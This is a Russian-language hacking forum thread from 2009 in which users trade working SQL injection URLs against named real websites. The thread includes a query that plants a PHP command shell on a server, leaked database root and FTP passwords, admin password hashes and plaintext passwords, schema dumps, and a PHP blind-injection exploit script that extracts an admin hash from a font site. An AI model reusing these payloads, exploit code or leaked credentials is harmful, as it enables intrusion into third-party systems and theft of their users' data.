Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
11.01.2009, 11:14
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
Заказчик пропал сволочь =)
Кидаю в паблик.
www.genialpix.net
Залил шелл через скулю.
http://genialpix.net/index.php?categoria=&id=-1619+union+select+1,2,3,4,5,6,0x3c3f2073797374656d 28245f4745545b27636d64275d293b203f3e,8,9,10,11,12, 13,14,15,16,17,18,19,20,21+from+mysql.user+into+ou tfile+'/var/www/html/tmp/c.php'/*
Рут от бд.
define("DB_NAME_I", "swaptables");
define("DB_HOST_I", "localhost");
define("DB_USERNAME_I", "root");
define("DB_PASSWORD_I", "zawajiko");
Данные от фтп:
FTP_HOST 84.253.182.210
FTP_USERNAME webdev
FTP_PASSWORD micaqene
Шопы, мерчи, etc...
__________________________________________________ ______________________
http://www.bethelhebrew.org/news/bulletin_show.php?id=13%20UNION%20SELECT%201,2,3,c onvert(concat_ws(0x3A3a,user_login,user_pass)+usin g+latin1),5%20from%20msgs_users/*
admin::4b631f451436e97276e01d5eb10d411e
__________________________________________________ ______________________
http://www.bellyart.com.au/productDetail.php?id=-59+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,c oncat_ws(0x3A3a,table_schema,table_name),16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30+from+informati on_schema.tables/*
__________________________________________________ ______________________
http://www.familyrelatives.com/information/info_detail.php?id=-96'+union+select+1,version(),3,4/*
admin::e00cf25ad42683b3df678c61f42c6bda::admin1
http://www.familyrelatives.com/admin/ -админка
__________________________________________________ ______________________
http://food.truelife.com/after_work/board.php?id=-3+union+select+1,2,3,4,concat_ws(0x3A3a,ID,USER,PA SS),6,7,8,9,10,11+from+admin/*
root::*210BDAB70126948BA5C27B2C9AD3068C1BD814C8
twsiteman::*87FAB66E43DD1EC6C4966796F9FEAFFA809545 32
Админка
http://food.truelife.com/admin
Логи и пасс
1::admin:: DGTfoodworld
__________________________________________________ ______________________
https://ghdrugs.com/product.php?cat_id=-1+union+select+1,concat(name,0x3a,pass,0x3a,email) ,3,4,5,6,7,8,9,10,11,12,13,14+from+webshop_admins/*
https://ghdrugs.com/admin админка
cody01:132722ce61ad9c643a3f4a94783c31dd:BicskA43
kacsa:97854a8e4ba36ef8c9ea711ebed54d6c:firgering
Продолжение следует =)
Последний раз редактировалось ThreeD; 11.01.2009 в 13:22..
|
|
|
11.01.2009, 13:30
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
http://www.toumaz.com/public/news.php?id=999+UNION+SELECT+1,2,3,concat_ws(0x3a3 a,version(),user(),database()),5,6+--
standard::toumaz_extrastuf@evoked.evokedset.net::t oumaz
=========================
http://www.welsh-premier.com/news.php?ID=99999+UNIOn+SELECT+1,concat_ws(0x3a3a, version(),user(),database()),3,4,5,6,7,8,9,10,11,1 2,13+--
4.1.19::welshprem@localhost::welshprem
=========================
http://www.electionguide.org/country-news.php?ID=-208+union+select+1,2,concat_ws(0x3a3a,version(),us er(),database()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 ,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0--
смотрим в титл (спасибо R1dex'у)
4.1.22::eguide@localhost::eguide
Последний раз редактировалось wildshaman; 11.01.2009 в 13:38..
|
|
|
|
11.01.2009, 15:50
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
"Выставка деловой авиации"
Код:
http://2006.jetexpo.ru/?act=jet&next=-3+union+select+1,2,3,version(),5,6,7,8,9,null,11--
5.0.67-log
__________________________________________________ ____
"Туристическая фирма АЗАРТ"
Код:
http://www.hazart.ru/index.php?id=-43+union+select+1,2,3,4,5,version()--
5.0.67-log
__________________________________________________ ____
"IndexBox – это маркетинговые исследования, анализ и обзоры рынков"
Код:
http://index-box.ru/news/?news_id=-57+union+select+1,2,concat(login,0x3a,password),4,5,6,7,8,9,10,11,12+from+indexbox_users--
quake : 8fb1a40e1f09124c07763cd75f664c5c : rfrnec
Код:
http://index-box.ru/admin/
|
|
|
|
11.01.2009, 16:55
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
http://www.logsec.com/news_record.php?news_id=-82+union+select+1,2,3,concat_ws(0x3a3a,version(),u ser(),database()),5+--
4.1.22::logsec-www@localhost::logsec
============
http://www.raconline.org/news/news_details.php?news_id=-10204+union+select+1,2,concat_ws(0x3a3a,version(), user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 ,50,51,52,53+--
5.0.51a::w_rac@localhost::rac
ПР 7!
Структура:
Код:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
bordercontact
bordercontactstate
bordercontacttopic
borderdata
bordertopic
bordertopicdoc
bordertopicjournal
bordertopicorg
bordertopicrelated
bordertopicsuccess
bordertopictool
cam_test
contactexpert
contacts
data
deltacontact
deltacontactstate
deltatopic
deltatopicdoc
deltatopicjournal
deltatopicorg
deltatopicsuccess
deltatopictool
docpubtopic
docs
docsubject
events
experts
filetest
funding
fundingbordertopic
fundingdeltatopic
fundinggranttopic
glossary
granttopic
igdoc
igevent
igfunding
igglossary
igjournal
igmap
ignews
igorg
igtool
infoguides
infoguidesee
journalpubtopic
journals
julie
list
listTEST
listserv
maps
newig
news
newstopic
organizations
orggroup
newig
news
newstopic
organizations
orggroup
orgorggroup
promotions
pubtopics
relationships
requestors
rhinaddress
rhinagency
rhinbureau
rhindept
rhinlist
rhinlistparticipants
rhinorg
rhinpeople
rhinupdate
searchlog
see
statedoc
statefunding
statejournal
statemap
statenews
stateorg
states
stateterr
statetool
stopwords
subjects
success
successgranttopic
successstate
survey_aug2006
survey_june2003
survey_may2004
survey_may2007
survey_nov2004
survey_sept2005
territories
test
toolorggroup
toolpubtopic
tools
topic
trackuser
webuse
webwatch
===============================
http://www.roamsecure.net/pressitem.php?news_id=-189+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,vers ion(),user(),database()),8,9,10+FROM+INFORMATION_S CHEMA.TABLES+--
5.0.45::wsusr@localhost::roamsecure
Структурко:
Код:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
contentsofsite
contentsofsitedev
customers
customersdev
employment
employmentdev
employmentold
industrylinks
jobs
links
nav
navitem
news
newsdev
ourteam
partners
presskit
resources
Последний раз редактировалось wildshaman; 11.01.2009 в 18:16..
|
|
|
|
11.01.2009, 19:59
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
Код:
http://www.alpisport.cz/index.php?desk_contain=offer/news/news_action.php&desk_height=857&nws_id=-174%20union%20select%201,2,3,4,concat(username,0x3a,password,0x3a,check_password,0x3a,company,0x3a,firstname,0x3a,surname,0x3a,city,0x3a,email,0x3a,administrator),6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20users--
Вылезает целая куча пользователей с мыльниками адресами телефонами и т.д. Пароли без шифровки. Вход на главной страничке =) |
|
|
|
11.01.2009, 20:05
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
Провел на форуме:
728470
Репутация:
115
|
|
Google PR: 5/10
Yandex CY: 3600
Код:
http://www.lipetsk.ru/view.php?id=-762+union+select+1,2,3,4,5,6,group_concat(table_name),8,9,1,2,3,4,5+from+information_schema.tables+where+table_schema!=%27information_schema%27--+
Несколько сайтов походу на одной MySQL базе, в том числе база пользователей местного провайдера =) |
|
|
|
11.01.2009, 20:42
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
https://www.scottiescoffee.net/store/productdetail.php?id=-11+union+select+1,2,3,4,5,concat_ws(0x3a3a,version (),user(),database()),7,8,9,10,11,12+--
5.0.67-community::scotties_kirby@localhost::scotties_coff ee
===============================
http://www.keenanwinery.com/productdetail.php?id=-81+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18+--
4.1.22-standard::kwine@localhost::ssl_keenanwinery_com_-_wine
===============================
http://www.sargodhatrackplant.com/productDetail.php?ID=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a3a,versio n(),user(),database()),8,9,10,11+--
5.0.51a-community::stpadmin@localhost::stpdata
===============================
http://www.gpssource.com/productdetail.php?id=-146+union+select+1,2,concat_ws(0x3a3a,version(),us er(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27+--
4.0.27::root@localhost::gpsdb
===============================
http://www.gulfphotoplus.com/gppnew/ProductDetail.php?ID=-455+union+select+1,2,3,4,concat_ws(0x3a3a,version( ),user(),database()),6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 +--
5.0.22::gulfpp@localhost::gulfbcom_uks15467gpp1
===============================
http://www.arrowvalves.co.uk/productdetail.php?id=-1+union+select+1,2,concat_ws(0x3a3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13+--
4.0.27-standard-log::dbo157947898@212.227.127.61::db157947898
===============================
http://www.splitreason.com/productdetail.php?id=-329+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,ve rsion(),user(),database()),9,10,11,12,13,14,15+--
5.0.67-log::split_w@localhost::split_splitreason
===============================
http://www.alabamacylinderhead.com/productdetail.php?id=-109+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,concat_ws(0x3a3a,version(),user(),d atabase()),21,22,23,24,25,26+--
5.0.32-Debian_7etch8-log::acheinc@localhost::alcylinder
===============================
хух, на сегоднея все. Кто что интересное там раскопайте - отпишитесь в ПМ плиз )
Последний раз редактировалось wildshaman; 11.01.2009 в 20:50..
|
|
|
|
11.01.2009, 21:08
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
Кому не лень покрутите +)
http://www.pa-digital.com.pa/admin_pa/preview.php?id=-%2020096+union+select+%201,2/*
http://bagrat.ru/index.php?page_id=-1%20union%20select%201,2,3,4,concat(version(),0x3a ,database()),6%20--
http://wow.glgilde.de/gildenseite/index.php?site=news_comments&newsID=-1%20union%20select%201,2,version(),4,5,6--
http://www.favex.fi/index.php?id=9&news_action=view&news_id=-5+union%20select%201,2,table_name,4,5,6,7%20from%2 0information_schema.tables%20limit%2020,1%20--
http://yeshua.grrbrr.ca/news_action.phtml?article_id=-2 union select 1,2,3,4,5,6,7,8,9--
http://www.hensel-haustechnik.de/index.php?&news_action=show&news_id=-
http://www.dakom.cg.yu/_eng/index.php?detaljnije&id=2%20union%20select%201,2%2 0--
|
|
|
|
11.01.2009, 21:14
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
Провел на форуме:
728470
Репутация:
115
|
|
http://www.dafont.com/ PR7
Уязвим куки параметр dfcolorid, перебором достаем хэш любого юзера. Сделал сплоит:
PHP код:
<?php
error_reporting(E_ALL);
set_time_limit(0);
for ($j=1; $j<50; $j++) {
for ($i=1; $i<255; $i++) {
$ch=curl_init();
$ua = 'User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Widows NT)';
curl_setopt($ch, CURLOPT_URL, "http://www.dafont.com/color.php");
curl_setopt($ch, CURLOPT_USERAGENT, $ua);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_REFERER, "http://www.dafont.com/color.php");
curl_setopt($ch, CURLOPT_COOKIE, "PHPSESSID=79302419265e6a9cff6b242ced6723fa; dfu2=221554|c2fe885b93fc3ce0dc1eada368172049; dfcolorid=364822*if(ASCII(SUBSTRING((select password from user where username=0x61646D696E), $j, 1))=$i,2,1)");
$answer=curl_exec($ch);
curl_close($ch);
echo $i."=";
$color=substr($answer,strpos($answer,'name="nbg1"')+33,6);
if ($color=='66FF99') {echo "<br>Найден: ".$i; break;}
}
if ($i>=254) break;
}
?>
Не оптимизирован конечно но пох, за час достает хэш =)
Admin
4d5542b0965999f5aad0fcad908d6d09 |
|
|
|
11.01.2009, 21:22
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
Провел на форуме:
2358980
Репутация:
930
|
|
Сообщение от Assembler
Кому не лень покрутите +)
http://www.pa-digital.com.pa/admin_pa/preview.php?id=-%2020096+union+select+%201,2/*
http://bagrat.ru/index.php?page_id=-1%20union%20select%201,2,3,4,concat(version(),0x3a ,database()),6%20--
http://wow.glgilde.de/gildenseite/index.php?site=news_comments&newsID=-1%20union%20select%201,2,version(),4,5,6--
http://www.favex.fi/index.php?id=9&news_action=view&news_id=-5+union%20select%201,2,table_name,4,5,6,7%20from%2 0information_schema.tables%20limit%2020,1%20--
http://yeshua.grrbrr.ca/news_action.phtml?article_id=-2 union select 1,2,3,4,5,6,7,8,9--
http://www.hensel-haustechnik.de/index.php?&news_action=show&news_id=-
http://www.dakom.cg.yu/_eng/index.php?detaljnije&id=2%20union%20select%201,2%2 0--
нераскрученные inj, то что ты выложил половина не робит, больше такое сюда не кидай
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
